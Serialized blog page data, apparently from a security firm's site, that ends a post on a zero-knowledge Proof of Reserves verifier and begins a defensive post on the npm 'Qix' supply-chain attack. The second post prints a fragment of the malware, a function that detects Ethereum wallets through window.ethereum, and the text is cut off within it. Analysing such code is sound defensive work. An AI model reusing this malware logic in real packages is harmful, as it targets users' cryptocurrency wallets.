,[103694,103714],{"type":27,"tag":207,"props":103695,"children":103697},{"className":103696,"style":100316},[11324],[103698],{"type":27,"tag":207,"props":103699,"children":103700},{"style":100320},[103701,103705],{"type":27,"tag":207,"props":103702,"children":103704},{"className":103703,"style":11334},[11333],[],{"type":27,"tag":207,"props":103706,"children":103708},{"className":103707},[11339,11340,11341,11342],[103709],{"type":27,"tag":207,"props":103710,"children":103712},{"className":103711},[11294,11342],[103713],{"type":33,"value":1660},{"type":27,"tag":207,"props":103715,"children":103717},{"className":103716},[29017],[103718],{"type":33,"value":29020},{"type":27,"tag":207,"props":103720,"children":103722},{"className":103721},[11319],[103723],{"type":27,"tag":207,"props":103724,"children":103726},{"className":103725,"style":100347},[11324],[103727],{"type":27,"tag":207,"props":103728,"children":103729},{},[],{"type":27,"tag":207,"props":103731,"children":103733},{"className":103732},[11404],[103734],{"type":33,"value":11407},{"type":27,"tag":207,"props":103736,"children":103738},{"className":103737,"style":11411},[11372],[],{"type":27,"tag":207,"props":103740,"children":103742},{"className":103741},[11294,28860],[103743],{"type":33,"value":101732},{"type":27,"tag":207,"props":103745,"children":103747},{"className":103746},[11294,28860],[103748],{"type":33,"value":17929},{"type":27,"tag":207,"props":103750,"children":103752},{"className":103751},[11294],[103753,103758],{"type":27,"tag":207,"props":103754,"children":103756},{"className":103755},[11294,28860],[103757],{"type":33,"value":91568},{"type":27,"tag":207,"props":103759,"children":103761},{"className":103760},[11309],[103762],{"type":27,"tag":207,"props":103763,"children":103765},{"className":103764},[11314,28914],[103766,103795],{"type":27,"tag":207,"props":103767,"children":103769},{"className":103768},[11319],[103770,103790],{"type":27,"tag":207,"props":103771,"children":103773},{"className":103772,"style":100316},[11324],[103774],{"type":27,"tag":207,"props":103775,"children":103776},{"style":100320},[103777,103781],{"type":27,"tag":207,"props":103778,"children":103780},{"className":103779,"style":11334},[11333],[],{"type":27,"tag":207,"props":103782,"children":103784},{"className":103783},[11339,11340,11341,11342],[103785],{"type":27,"tag":207,"props":103786,"children":103788},{"className":103787},[11294,11342],[103789],{"type":33,"value":1651},{"type":27,"tag":207,"props":103791,"children":103793},{"className":103792},[29017],[103794],{"type":33,"value":29020},{"type":27,"tag":207,"props":103796,"children":103798},{"className":103797},[11319],[103799],{"type":27,"tag":207,"props":103800,"children":103802},{"className":103801,"style":100347},[11324],[103803],{"type":27,"tag":207,"props":103804,"children":103805},{},[],{"type":27,"tag":207,"props":103807,"children":103809},{"className":103808},[11404],[103810],{"type":33,"value":11407},{"type":27,"tag":207,"props":103812,"children":103814},{"className":103813,"style":11411},[11372],[],{"type":27,"tag":207,"props":103816,"children":103818},{"className":103817},[11294],[103819],{"type":33,"value":16867},{"type":27,"tag":207,"props":103821,"children":103823},{"className":103822},[11404],[103824],{"type":33,"value":11407},{"type":27,"tag":207,"props":103826,"children":103828},{"className":103827,"style":11411},[11372],[],{"type":27,"tag":207,"props":103830,"children":103832},{"className":103831},[11294,28860],[103833],{"type":33,"value":101732},{"type":27,"tag":207,"props":103835,"children":103837},{"className":103836},[11294,28860],[103838],{"type":33,"value":17929},{"type":27,"tag":207,"props":103840,"children":103842},{"className":103841},[11294],[103843,103848],{"type":27,"tag":207,"props":103844,"children":103846},{"className":103845},[11294,28860],[103847],{"type":33,"value":91568},{"type":27,"tag":207,"props":103849,"children":103851},{"className":103850},[11309],[103852],{"type":27,"tag":207,"props":103853,"children":103855},{"className":103854},[11314,28914],[103856,103889],{"type":27,"tag":207,"props":103857,"children":103859},{"className":103858},[11319],[103860,103884],{"type":27,"tag":207,"props":103861,"children":103863},{"className":103862,"style":100316},[11324],[103864],{"type":27,"tag":207,"props":103865,"children":103866},{"style":100320},[103867,103871],{"type":27,"tag":207,"props":103868,"children":103870},{"className":103869,"style":11334},[11333],[],{"type":27,"tag":207,"props":103872,"children":103874},{"className":103873},[11339,11340,11341,11342],[103875],{"type":27,"tag":207,"props":103876,"children":103878},{"className":103877},[11294,11342],[103879],{"type":27,"tag":207,"props":103880,"children":103882},{"className":103881},[11294,11342],[103883],{"type":33,"value":3660},{"type":27,"tag":207,"props":103885,"children":103887},{"className":103886},[29017],[103888],{"type":33,"value":29020},{"type":27,"tag":207,"props":103890,"children":103892},{"className":103891},[11319],[103893],{"type":27,"tag":207,"props":103894,"children":103896},{"className":103895,"style":100347},[11324],[103897],{"type":27,"tag":207,"props":103898,"children":103899},{},[],{"type":27,"tag":207,"props":103901,"children":103903},{"className":103902},[29011],[103904],{"type":33,"value":10416},{"type":33,"value":13740},{"type":27,"tag":12606,"props":103907,"children":103908},{},[103909],{"type":33,"value":102052},{"type":27,"tag":1232,"props":103911,"children":103912},{},[103913,103918,103919],{"type":27,"tag":942,"props":103914,"children":103915},{},[103916],{"type":33,"value":103917},"checks if each sum is overflowing by checking if the sum of two positive numbers results in a negative one",{"type":33,"value":13740},{"type":27,"tag":12606,"props":103920,"children":103921},{},[103922],{"type":33,"value":102336},{"type":27,"tag":36,"props":103924,"children":103925},{},[103926],{"type":33,"value":103927},"Here is a visual scheme of the inputs of the recursive circuit. Note that this tree only has three levels (L1, L2, L3). Depending on the number of users, it may have more recursive levels:",{"type":27,"tag":36,"props":103929,"children":103930},{},[103931],{"type":27,"tag":126,"props":103932,"children":103934},{"alt":57817,"src":103933},"/posts/por/recursive-circuit.png",[],{"type":27,"tag":28,"props":103936,"children":103938},{"id":103937},"global-proof-and-inclusion-proofs",[103939],{"type":33,"value":103940},"Global Proof and Inclusion Proofs",{"type":27,"tag":58,"props":103942,"children":103943},{"id":16557},[103944],{"type":33,"value":103945},"Proving",{"type":27,"tag":36,"props":103947,"children":103948},{},[103949,103951,103957,103958,103964,103965,103971],{"type":33,"value":103950},"After proving all batch circuits and all recursive circuits, we have the final proof (which is the ZK proof of the recursive tree root), the entire Merkle tree, and the user nonces. In our code, it is serialized to ",{"type":27,"tag":84,"props":103952,"children":103954},{"className":103953},[],[103955],{"type":33,"value":103956},"merkle_tree.json",{"type":33,"value":1123},{"type":27,"tag":84,"props":103959,"children":103961},{"className":103960},[],[103962],{"type":33,"value":103963},"final_proof.json",{"type":33,"value":4601},{"type":27,"tag":84,"props":103966,"children":103968},{"className":103967},[],[103969],{"type":33,"value":103970},"private_nonces.json",{"type":33,"value":103972}," files.",{"type":27,"tag":36,"props":103974,"children":103975},{},[103976],{"type":33,"value":103977},"Using the ZK proof and the Merkle tree, we can already prove the sum of the asset balances and their non-negativity; we refer to this as the \"global proof.\"",{"type":27,"tag":36,"props":103979,"children":103980},{},[103981,103983,103989,103991,103996],{"type":33,"value":103982},"For the user inclusion proofs, we get the Merkle tree, the user asset balances, the identification hash, and the nonce to bundle it in one proof file (",{"type":27,"tag":84,"props":103984,"children":103986},{"className":103985},[],[103987],{"type":33,"value":103988},"inclusion_proof_\u003Cid>.json",{"type":33,"value":103990},"). ",{"type":27,"tag":942,"props":103992,"children":103993},{},[103994],{"type":33,"value":103995},"We bundle only a part of the Merkle tree to the inclusion proof file to make the proof smaller",{"type":33,"value":1041},{"type":27,"tag":58,"props":103998,"children":104000},{"id":103999},"verifying",[104001],{"type":33,"value":104002},"Verifying",{"type":27,"tag":36,"props":104004,"children":104005},{},[104006],{"type":27,"tag":12606,"props":104007,"children":104008},{},[104009],{"type":33,"value":104010},"Global Proof",{"type":27,"tag":36,"props":104012,"children":104013},{},[104014,104016,104021,104022,104027],{"type":33,"value":104015},"To verify the global proof, the code deserializes the ",{"type":27,"tag":84,"props":104017,"children":104019},{"className":104018},[],[104020],{"type":33,"value":103956},{"type":33,"value":44798},{"type":27,"tag":84,"props":104023,"children":104025},{"className":104024},[],[104026],{"type":33,"value":103963},{"type":33,"value":104028}," files and performs these checks:",{"type":27,"tag":12719,"props":104030,"children":104031},{},[104032,104037,104042,104047,104073],{"type":27,"tag":1232,"props":104033,"children":104034},{},[104035],{"type":33,"value":104036},"Validate if the final proof was generated with a valid and trusted circuit.",{"type":27,"tag":1232,"props":104038,"children":104039},{},[104040],{"type":33,"value":104041},"Verify the ZK final proof.",{"type":27,"tag":1232,"props":104043,"children":104044},{},[104045],{"type":33,"value":104046},"Verify if asset prices are valid. (It doesn't verify if it matches the real price; you need to do it manually. It only verifies if decimals are valid.)",{"type":27,"tag":1232,"props":104048,"children":104049},{},[104050,104052,104058,104060,104065,104066,104071],{"type":33,"value":104051},"Verify if the Merkle tree root hash is the same as the final proof ",{"type":27,"tag":84,"props":104053,"children":104055},{"className":104054},[],[104056],{"type":33,"value":104057},"merkle_tree_hash",{"type":33,"value":104059}," public input. This ensures that the ",{"type":27,"tag":84,"props":104061,"children":104063},{"className":104062},[],[104064],{"type":33,"value":103956},{"type":33,"value":1131},{"type":27,"tag":84,"props":104067,"children":104069},{"className":104068},[],[104070],{"type":33,"value":103963},{"type":33,"value":104072}," are linked (they belong to the same global proof).",{"type":27,"tag":1232,"props":104074,"children":104075},{},[104076],{"type":33,"value":104077},"Verify the entire Merkle tree by hashing all the nodes again, starting with the batch circuit, since the verifier won't have the necessary information to hash the leaves again (for privacy). This ensures that the tree was not tampered with.",{"type":27,"tag":36,"props":104079,"children":104080},{},[104081],{"type":27,"tag":12606,"props":104082,"children":104083},{},[104084],{"type":33,"value":104085},"Inclusion Proof",{"type":27,"tag":36,"props":104087,"children":104088},{},[104089,104091,104096,104098,104103],{"type":33,"value":104090},"To verify the inclusion proof, the code deserializes the ",{"type":27,"tag":84,"props":104092,"children":104094},{"className":104093},[],[104095],{"type":33,"value":103988},{"type":33,"value":104097}," file and also the ",{"type":27,"tag":84,"props":104099,"children":104101},{"className":104100},[],[104102],{"type":33,"value":103963},{"type":33,"value":104104},". After that, it performs these checks:",{"type":27,"tag":12719,"props":104106,"children":104107},{},[104108,104112,104117,104122],{"type":27,"tag":1232,"props":104109,"children":104110},{},[104111],{"type":33,"value":104041},{"type":27,"tag":1232,"props":104113,"children":104114},{},[104115],{"type":33,"value":104116},"Verify if the Merkle tree root is the same as in the final proof.",{"type":27,"tag":1232,"props":104118,"children":104119},{},[104120],{"type":33,"value":104121},"Recalculate the user-related node leaf hash.",{"type":27,"tag":1232,"props":104123,"children":104124},{},[104125],{"type":33,"value":104126},"Verify a partial Merkle tree using the recalculated hash (it doesn't contain all the leaves).",{"type":27,"tag":28,"props":104128,"children":104130},{"id":104129},"por-verifier-server",[104131],{"type":33,"value":104132},"PoR Verifier Server",{"type":27,"tag":36,"props":104134,"children":104135},{},[104136,104138,104144],{"type":33,"value":104137},"To automate the verification process, we created a ",{"type":27,"tag":47,"props":104139,"children":104141},{"href":99775,"rel":104140},[51],[104142],{"type":33,"value":104143},"verifier server",{"type":33,"value":104145}," that the exchange can submit the proofs into. Once submitted, the proof is validated and added to the database.",{"type":27,"tag":36,"props":104147,"children":104148},{},[104149],{"type":33,"value":104150},"Once the proof was added, any user can enter the website and see its information (see backpack's example):",{"type":27,"tag":36,"props":104152,"children":104153},{},[104154],{"type":27,"tag":126,"props":104155,"children":104157},{"alt":57817,"src":104156},"/posts/por/backpack-por.png",[],{"type":27,"tag":36,"props":104159,"children":104160},{},[104161],{"type":33,"value":104162},"Here is a breakdown of what fields represent and why they are required:",{"type":27,"tag":1228,"props":104164,"children":104165},{},[104166,104176,104186,104196,104206,104216],{"type":27,"tag":1232,"props":104167,"children":104168},{},[104169,104174],{"type":27,"tag":12606,"props":104170,"children":104171},{},[104172],{"type":33,"value":104173},"Status",{"type":33,"value":104175}," --> verifies if the proof is valid, ensuring that the information has not been tampered with.",{"type":27,"tag":1232,"props":104177,"children":104178},{},[104179,104184],{"type":27,"tag":12606,"props":104180,"children":104181},{},[104182],{"type":33,"value":104183},"Proof Timestamp",{"type":33,"value":104185}," --> when the proof was generated by the exchange.",{"type":27,"tag":1232,"props":104187,"children":104188},{},[104189,104194],{"type":27,"tag":12606,"props":104190,"children":104191},{},[104192],{"type":33,"value":104193},"Verify Timestamp",{"type":33,"value":104195}," --> when the proof was verified by the PoR server.",{"type":27,"tag":1232,"props":104197,"children":104198},{},[104199,104204],{"type":27,"tag":12606,"props":104200,"children":104201},{},[104202],{"type":33,"value":104203},"Proof File URL",{"type":33,"value":104205}," --> the URL where the proof was downloaded from. Users can download it to verify the proof's validity themselves.",{"type":27,"tag":1232,"props":104207,"children":104208},{},[104209,104214],{"type":27,"tag":12606,"props":104210,"children":104211},{},[104212],{"type":33,"value":104213},"Prover Version",{"type":33,"value":104215}," --> the version of PoRv2 used. Using different versions for proving/verifying can result in errors due to ZK circuit discrepancies. Therefore, if you are going to verify the validity of the proof yourself, ensure that you download and use the same prover version as the proof.",{"type":27,"tag":1232,"props":104217,"children":104218},{},[104219,104224],{"type":27,"tag":12606,"props":104220,"children":104221},{},[104222],{"type":33,"value":104223},"File Hash (SHA256)",{"type":33,"value":104225}," --> since we only store the URL of the proof, it can be maliciously changed after our verification. SHA256 can be used to prove if the file was modified after the verification. If you are going to verify the proof by yourself, check if the downloaded zip file matches the hash shown on the website.",{"type":27,"tag":36,"props":104227,"children":104228},{},[104229],{"type":33,"value":104230},"Also, you can check the exchange's liabilities on the website:",{"type":27,"tag":36,"props":104232,"children":104233},{},[104234],{"type":27,"tag":126,"props":104235,"children":104237},{"alt":57817,"src":104236},"/posts/por/backpack-por-liabilities.png",[],{"type":27,"tag":36,"props":104239,"children":104240},{},[104241,104243,104249,104251,104257],{"type":33,"value":104242},"These are the amount of assets that the exchange should have in their reserves to be solvent on each asset. You can match if they have it by checking their reserve wallets on blockchain. You can see backpack's wallets in ",{"type":27,"tag":47,"props":104244,"children":104247},{"href":104245,"rel":104246},"https://backpack.exchange/reserves",[51],[104248],{"type":33,"value":104245},{"type":33,"value":104250}," and our verifier server for backpack at ",{"type":27,"tag":47,"props":104252,"children":104255},{"href":104253,"rel":104254},"https://backpack-por.osec.io/",[51],[104256],{"type":33,"value":104253},{"type":33,"value":1041},{"type":27,"tag":28,"props":104259,"children":104261},{"id":104260},"self-verification",[104262],{"type":33,"value":104263},"Self-verification",{"type":27,"tag":36,"props":104265,"children":104266},{},[104267],{"type":33,"value":104268},"You, as a user, can verify both proofs by yourself, the inclusion proof to verify if you were included in the PoR total liabilities sum and the global proof to verify if the commitments provided by the exchange are valid.",{"type":27,"tag":58,"props":104270,"children":104272},{"id":104271},"how-to-verify-if-i-was-included",[104273],{"type":33,"value":104274},"How to verify if I was included?",{"type":27,"tag":36,"props":104276,"children":104277},{},[104278],{"type":33,"value":104279},"If you are a user and want to do the self-verification of inclusion, you will need to follow these steps:",{"type":27,"tag":12719,"props":104281,"children":104282},{},[104283,104294,104312],{"type":27,"tag":1232,"props":104284,"children":104285},{},[104286,104293],{"type":27,"tag":47,"props":104287,"children":104290},{"href":104288,"rel":104289},"https://github.com/otter-sec/por_v2/releases",[51],[104291],{"type":33,"value":104292},"Download the PoRv2 executable from our github",{"type":33,"value":1041},{"type":27,"tag":1232,"props":104295,"children":104296},{},[104297,104299,104304,104305,104310],{"type":33,"value":104298},"Download the inclusion and the final proof files from the exchange (",{"type":27,"tag":84,"props":104300,"children":104302},{"className":104301},[],[104303],{"type":33,"value":103988},{"type":33,"value":1131},{"type":27,"tag":84,"props":104306,"children":104308},{"className":104307},[],[104309],{"type":33,"value":103963},{"type":33,"value":104311},") and put the files in the same directory as the PoRv2 app.",{"type":27,"tag":1232,"props":104313,"children":104314},{},[104315,104317,104323],{"type":33,"value":104316},"Open the terminal and execute this: ",{"type":27,"tag":84,"props":104318,"children":104320},{"className":104319},[],[104321],{"type":33,"value":104322},"./plonky2_por verify-inclusion",{"type":33,"value":1041},{"type":27,"tag":36,"props":104325,"children":104326},{},[104327],{"type":33,"value":104328},"This will verify if the proofs are valid and show your asset balances. You will need to verify manually that the balances are correct. Remember that the proofs are not calculated in real-time; you must verify if the balances were correct at the proof generation date. Here is an example of a valid proof being verified:",{"type":27,"tag":101,"props":104330,"children":104332},{"code":104331},"[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Some asset balances was rounded by some decimals, verify if they are close enough to the original balance\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset balances-----\nETH: 0\nBTC: 1.2\nUSDC: 0\n...\n======================\n[!] Verifying global proof (trusting circuit data inside the file)...\n[+] Global proof is valid!\n[!] Verifying inclusion proof...\n[+] Inclusion proof root hash is valid! The user is included in the merkle tree!\n[+] Successfully verified inclusion proof for file: inclusion_proof_00476816e43cf2efffdabdda7f55c5203bc9e28382c551f83931de02fd364a25.json\n\n[+] All inclusion proofs are valid!\n[+] Finished in 13.731875ms!\n",[104333],{"type":27,"tag":84,"props":104334,"children":104335},{"__ignoreMap":7},[104336],{"type":33,"value":104331},{"type":27,"tag":58,"props":104338,"children":104340},{"id":104339},"how-can-i-verify-the-global-proof",[104341],{"type":33,"value":104342},"How can I verify the global proof?",{"type":27,"tag":36,"props":104344,"children":104345},{},[104346],{"type":33,"value":104347},"If you want to verify if the global proof is valid, you just need to follow these steps:",{"type":27,"tag":12719,"props":104349,"children":104350},{},[104351,104360,104378],{"type":27,"tag":1232,"props":104352,"children":104353},{},[104354,104359],{"type":27,"tag":47,"props":104355,"children":104357},{"href":104288,"rel":104356},[51],[104358],{"type":33,"value":104292},{"type":33,"value":1041},{"type":27,"tag":1232,"props":104361,"children":104362},{},[104363,104365,104370,104371,104376],{"type":33,"value":104364},"Download the ",{"type":27,"tag":84,"props":104366,"children":104368},{"className":104367},[],[104369],{"type":33,"value":103956},{"type":33,"value":44798},{"type":27,"tag":84,"props":104372,"children":104374},{"className":104373},[],[104375],{"type":33,"value":103963},{"type":33,"value":104377}," files and put them in the same directory as the PoRv2 app. You can download those files from our PoR verifier server (download the zip file and unzip it).",{"type":27,"tag":1232,"props":104379,"children":104380},{},[104381,104383,104388],{"type":33,"value":104382},"Open the terminal and execute ",{"type":27,"tag":84,"props":104384,"children":104386},{"className":104385},[],[104387],{"type":33,"value":104322},{"type":33,"value":104389},". This might take a while to verify since it needs to deserialize a big file and verify the final proof circuit (which involves rebuilding it).",{"type":27,"tag":36,"props":104391,"children":104392},{},[104393],{"type":33,"value":104394},"This will verify the global proof and print the asset prices to be manually verified. Note that the asset prices shown are not real-time; you must match them to the price on the proof generation date and time.",{"type":27,"tag":101,"props":104396,"children":104398},{"code":104397},"[!] Verifying the proof of reserves...\n[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Asset prices was rounded by some decimals, verify if they are close enough to the original price\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset prices-----\nBTC: US$ 95000\nETH: US$ 2402.48\n...\n======================\n",[104399],{"type":27,"tag":84,"props":104400,"children":104401},{"__ignoreMap":7},[104402],{"type":33,"value":104397},{"type":27,"tag":36,"props":104404,"children":104405},{},[104406],{"type":33,"value":104407},"When verification is completed, and all proofs are valid, the system will print the summed balances of each asset. These are the liabilities of the exchange, which you can use to check if they have reserves to cover it.",{"type":27,"tag":101,"props":104409,"children":104411},{"code":104410},"[!] Rebuilding root circuit... This might take several minutes...\n[+] Root circuit rebuilt successfully!\n[!] Verifying final proof...\n[+] Proof is valid!\n[!] Verifying asset prices...\n[+] Asset prices are valid!\n[!] Verifying asset decimals...\n[+] Asset decimals are valid!\n[!] Verifying merkle tree root hash...\n[+] Merkle tree root hash is valid!\n[!] Verifying merkle tree...\n[+] Merkle tree is valid!\n\n[!] The following information is the final needed asset reserves, which was validated by the Zero-Knowledge proof\n[!] NOTE: This is not real-time information, the information is relative to the time of the proof generation\n[!] NOTE2: We cannot guarantee that all users were included in the proof, but you can check if you were included by verifying the inclusion proof\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset reserves-----\nBTC: 1.2\nETH: 5.4\n...\n======================\n\n[+] All proofs are valid!\n[+] Finished in 4.455745214s!\n",[104412],{"type":27,"tag":84,"props":104413,"children":104414},{"__ignoreMap":7},[104415],{"type":33,"value":104410},{"type":27,"tag":28,"props":104417,"children":104418},{"id":10112},[104419],{"type":33,"value":10115},{"type":27,"tag":36,"props":104421,"children":104422},{},[104423],{"type":33,"value":104424},"In conclusion, Proof of Reserves serves as a crucial mechanism for crypto platforms, enabling them to demonstrate solvency and gain user trust in a transparent manner. By employing zero-knowledge proofs, platforms can achieve this transparency without exposing sensitive user data, effectively proving total liabilities and ensuring non-negativity while preserving privacy. Our system further refines this process, boosting efficiency and eliminating the need for manual verification.",{"type":27,"tag":36,"props":104426,"children":104427},{},[104428,104430,104436],{"type":33,"value":104429},"We are currently working with Backpack to implement this algorithm ",{"type":27,"tag":47,"props":104431,"children":104433},{"href":104245,"rel":104432},[51],[104434],{"type":33,"value":104435},"in production",{"type":33,"value":104437}," to generate and verify proofs every 24 hours. This marks a significant advancement toward establishing a real-time Proof of Reserves system, particularly given that it offers increased transparency, which is a step forward in reducing the need for external audit companies, as users will be able to verify everything themselves.",{"type":27,"tag":36,"props":104439,"children":104440},{},[104441,104443,104450],{"type":33,"value":104442},"For more information about how Backpack Exchange implements Proof of Reserves in practice, you can read their detailed article: ",{"type":27,"tag":47,"props":104444,"children":104447},{"href":104445,"rel":104446},"https://learn.backpack.exchange/articles/proof-of-reserves-at-backpack",[51],[104448],{"type":33,"value":104449},"Proof of Reserves at Backpack Exchange: Real Transparency, ZK Verified",{"type":33,"value":1041},{"title":7,"searchDepth":244,"depth":244,"links":104452},[104453,104454,104455,104456,104459,104464,104468,104469,104473],{"id":99703,"depth":244,"text":99706},{"id":99784,"depth":244,"text":99787},{"id":99854,"depth":244,"text":99857},{"id":99908,"depth":244,"text":99911,"children":104457},[104458],{"id":99987,"depth":270,"text":99990},{"id":100075,"depth":244,"text":100078,"children":104460},[104461,104462,104463],{"id":100148,"depth":270,"text":100151},{"id":100620,"depth":270,"text":100623},{"id":102359,"depth":270,"text":102362},{"id":103937,"depth":244,"text":103940,"children":104465},[104466,104467],{"id":16557,"depth":270,"text":103945},{"id":103999,"depth":270,"text":104002},{"id":104129,"depth":244,"text":104132},{"id":104260,"depth":244,"text":104263,"children":104470},[104471,104472],{"id":104271,"depth":270,"text":104274},{"id":104339,"depth":270,"text":104342},{"id":10112,"depth":244,"text":10115},"content:blog:2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds",{"_path":104478,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":104479,"description":104480,"date":104481,"author":38462,"image":104482,"isFeatured":19,"onBlogPage":19,"tags":104484,"body":104487,"_type":10152,"_id":106913,"_source":10154,"_file":106914,"_stem":106915,"_extension":10157},"/blog/2025-09-13-how-to-survive-supply-chain-attacks","How to Survive Supply-Chain Attacks","The recent supply-chain attack on NPM showed how easily trusted dependencies can become delivery vectors for malware. Learn how the attack worked and practical defenses developers can implement to stay safe.","2025-09-13T12:00:00.000Z",{"src":104483,"width":17,"height":18},"/posts/supply-chain-attcks/title.png",[104485,104486],"npm","supply-chain",{"type":24,"children":104488,"toc":106896},[104489,104502,104507,104512,104518,104523,104531,104861,104869,105432,105440,106147,106153,106158,106164,106169,106174,106180,106185,106197,106202,106228,106315,106327,106352,106368,106373,106378,106584,106626,106631,106643,106649,106661,106703,106716,106796,106808,106821,106828,106839,106847,106853,106866,106871,106875,106880,106892],{"type":27,"tag":36,"props":104490,"children":104491},{},[104492,104494,104500],{"type":33,"value":104493},"The recent supply-chain attack on NPM sent shockwaves through the developer community and served as a stark reminder of the risks lurking within our dependencies. Malicious versions of widely used packages, including ",{"type":27,"tag":84,"props":104495,"children":104497},{"className":104496},[],[104498],{"type":33,"value":104499},"chalk",{"type":33,"value":104501},", were published containing sophisticated malware designed to steal cryptocurrency.",{"type":27,"tag":36,"props":104503,"children":104504},{},[104505],{"type":33,"value":104506},"This attack highlights a fundamental vulnerability in the open-source ecosystem: any package you install gets the same permissions as your own code, giving it a free pass to important resources such as cookies and the network stack.",{"type":27,"tag":36,"props":104508,"children":104509},{},[104510],{"type":33,"value":104511},"In this post, we'll break down how the malware worked and outline practical defenses developers can use, including Lavamoat, a tool already adopted by leaders in the web3 ecosystem.",{"type":27,"tag":28,"props":104513,"children":104515},{"id":104514},"qix-malware-how-it-worked",[104516],{"type":33,"value":104517},"Qix Malware: How It Worked",{"type":27,"tag":36,"props":104519,"children":104520},{},[104521],{"type":33,"value":104522},"The attacker published modified versions of packages with code designed to do three things:",{"type":27,"tag":12719,"props":104524,"children":104525},{},[104526],{"type":27,"tag":1232,"props":104527,"children":104528},{},[104529],{"type":33,"value":104530},"Detect crypto wallets: The malware checked for Ethereum wallets like MetaMask.",{"type":27,"tag":101,"props":104532,"children":104534},{"code":104533,"language":200,"meta":7,"className":201,"style":7},"async function checkethereumw() {\n try {\n const _0x124ed3 = await window.ethereum.request({\n 'method': \"eth_accounts\"\n });\n if (_0x124ed3.length > 0) {\n runmask();\n if (rund != 1) {\n rund = 1;\n neth = 1;\n newdlocal();\n }\n } else if (rund != 1) {\n rund = 1;\n newdlocal();\n }\n }\n}\n",[104535],{"type":27,"tag":84,"props":104536,"children":104537},{"__ignoreMap":7},[104538,104558,104570,104614,104631,104638,104674,104686,104714,104734,104754,104766,104773,104808,104828,104840,104847,104854],{"type":27,"tag":207,"props":104539,"children":104540},{"class":209,"line":210},[104541,104545,104549,104554],{"type":27,"tag":207,"props":104542,"children":104543},{"style":214},[104544],{"type":33,"value":2311},{"type":27,"tag":207,"props":104546,"children":104547},{"style":214},[104548],{"type":33,"value":45461},{"type":27,"tag":207,"props":104550,"children":104551},{"style":1335},[104552],{"type":33,"value":104553}," checkethereumw",{"type":27,"tag":207,"props":104555,"children":104556},{"style":238},[104557],{"type":33,"value":23011},{"type":27,"tag":207,"props":104559,"children":104560},{"class":209,"line":244},[104561,104566],{"type":27,"tag":207,"props":104562,"children":104563},{"style":376},[104564],{"type":33,"value":104565}," try",{"type":27,"tag":207,"props":104567,"children":104568},{"style":238},[104569],{"type":33,"value":384},{"type":27,"tag":207,"props":104571,"children":104572},{"class":209,"line":270},[104573,104577,104582,104586,104590,104594,104598,104602,104606,104610],{"type":27,"tag":207,"props":104574,"children":104575},{"style":214},[104576],{"type":33,"value":58904},{"type":27,"tag":207,"props":104578,"children":104579},{"style":220},[104580],{"type":33,"value":104581}," _0x124ed3",{"type":27,"tag":207,"props":104583,"children":104584},{"style":226},[104585],{"type":33,"value":229},{"type":27,"tag":207,"props":104587,"children":104588},{"style":376},[104589],{"type":33,"value":43461},{"type":27,"tag":207,"props":104591,"children":104592},{"style":220},[104593],{"type":33,"value":38668},{"type":27,"tag":207,"props":104595,"children":104596},{"style":238},[104597],{"type":33,"value":1041},{"type":27,"tag":207,"props":104599,"children":104600},{"style":220},[104601],{"type":33,"value":38677},{"type":27,"tag":207,"props":104603,"children":104604},{"style":238},[104605],{"type":33,"value":1041},{"type":27,"tag":207,"props":104607,"children":104608},{"style":1335},[104609],{"type":33,"value":38753},{"type":27,"tag":207,"props":104611,"children":104612},{"style":238},[104613],{"type":33,"value":22415},{"type":27,"tag":207,"props":104615,"children":104616},{"class":209,"line":296},[104617,104622,104626],{"type":27,"tag":207,"props":104618,"children":104619},{"style":1325},[104620],{"type":33,"value":104621}," 'method'",{"type":27,"tag":207,"props":104623,"children":104624},{"style":220},[104625],{"type":33,"value":736},{"type":27,"tag":207,"props":104627,"children":104628},{"style":1325},[104629],{"type":33,"value":104630}," \"eth_accounts\"\n",{"type":27,"tag":207,"props":104632,"children":104633},{"class":209,"line":445},[104634],{"type":27,"tag":207,"props":104635,"children":104636},{"style":238},[104637],{"type":33,"value":39516},{"type":27,"tag":207,"props":104639,"children":104640},{"class":209,"line":867},[104641,104645,104649,104654,104658,104662,104666,104670],{"type":27,"tag":207,"props":104642,"children":104643},{"style":376},[104644],{"type":33,"value":19556},{"type":27,"tag":207,"props":104646,"children":104647},{"style":238},[104648],{"type":33,"value":686},{"type":27,"tag":207,"props":104650,"children":104651},{"style":220},[104652],{"type":33,"value":104653},"_0x124ed3",{"type":27,"tag":207,"props":104655,"children":104656},{"style":238},[104657],{"type":33,"value":1041},{"type":27,"tag":207,"props":104659,"children":104660},{"style":220},[104661],{"type":33,"value":9476},{"type":27,"tag":207,"props":104663,"children":104664},{"style":226},[104665],{"type":33,"value":21470},{"type":27,"tag":207,"props":104667,"children":104668},{"style":232},[104669],{"type":33,"value":4680},{"type":27,"tag":207,"props":104671,"children":104672},{"style":238},[104673],{"type":33,"value":1424},{"type":27,"tag":207,"props":104675,"children":104676},{"class":209,"line":892},[104677,104682],{"type":27,"tag":207,"props":104678,"children":104679},{"style":1335},[104680],{"type":33,"value":104681}," 